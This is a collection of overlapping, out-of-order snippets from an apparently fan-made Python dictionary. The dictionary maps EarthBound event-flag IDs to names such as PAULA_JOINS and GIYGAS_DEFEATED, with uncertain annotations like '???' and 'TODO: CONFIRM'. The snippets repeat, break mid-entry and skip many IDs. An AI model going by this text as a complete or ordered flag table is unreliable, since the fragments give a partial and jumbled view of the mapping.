'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648:", "132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138:", "flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592:", "'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522", "'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND',", "'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE',", "749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755:", "518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) 
# 523", "767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after", "'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED',", "'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP',", "there's no NPC attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388:", "to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING',", "100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text", "'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172:", "135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm", "73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79:", "(Five moles defeated? How does this differ from 72?) # 283 (???) 284:", "397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403:", "'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852", "'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after defeating Giygas, but", "'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10',", "(Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN',", "'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk", "527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 
530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC',", "118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124:", "'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE',", "# TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144", "697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703:", "# 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237:", "Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)", "236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242:", "'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown.", "# 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED',", "830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6', 835: 'PRESENT_TONY_COOKIE_7' }", "only set if you're near (0x02A0, 0x0D70) in a radius of 16 pixels)", "# Unused, there's no NPC attached to the script for this battle 387:", "538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC',", "'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING',", "'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP',", "# Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 
107:", "255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261:", "'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED',", "486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492:", "193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown.", "402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408:", "337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN',", "'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT',", "Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT',", "'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY',", "615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to", "'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS',", "535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540", "# 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH',", "CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???)", "355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361:", "(Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', #", "723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729:", "'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199:", "'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 
672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674:", "207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213:", "in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630:", "some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', #", "(??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE',", "55 (Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58:", "'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED',", "657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663:", "322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328:", "460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???)", "186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192:", "'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS',", "197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE',", "'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house", "flags) # 232 (I hate multipurpose flags) # 233 (I hate multipurpose flags)", "set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags", "94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100:", "(Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779", "747 (??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750:", "303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 
306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED',", "(Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown.", "# The first Hieroglyph Guardian doesn't reference this flag and never fights you", "'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533:", "and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed, cleared", "407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413:", "City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321", "683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689:", "198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202:", "544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550:", "'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP',", "'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related", "'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD',", "# 227 (I hate multipurpose flags) # 228 (I hate multipurpose flags) #", "version uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2',", "to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE',", "623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli", "722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728:", "300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 
303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305", "34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40:", "flags) # 228 (I hate multipurpose flags) # 229 (I hate multipurpose flags)", "'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE',", "'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY',", "'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP',", "(Unknown. Something about the City Bus?) # 314 (Unknown. Something about the Runaway", "343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This is only", "'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS',", "'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE',", "'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576:", "is only set if you're near (0x02A0, 0x0D70) in a radius of 16", "682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688:", "'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic", "'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2',", "741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', #", "'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?)", "36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42:", "# 619 (Unkonwn. 
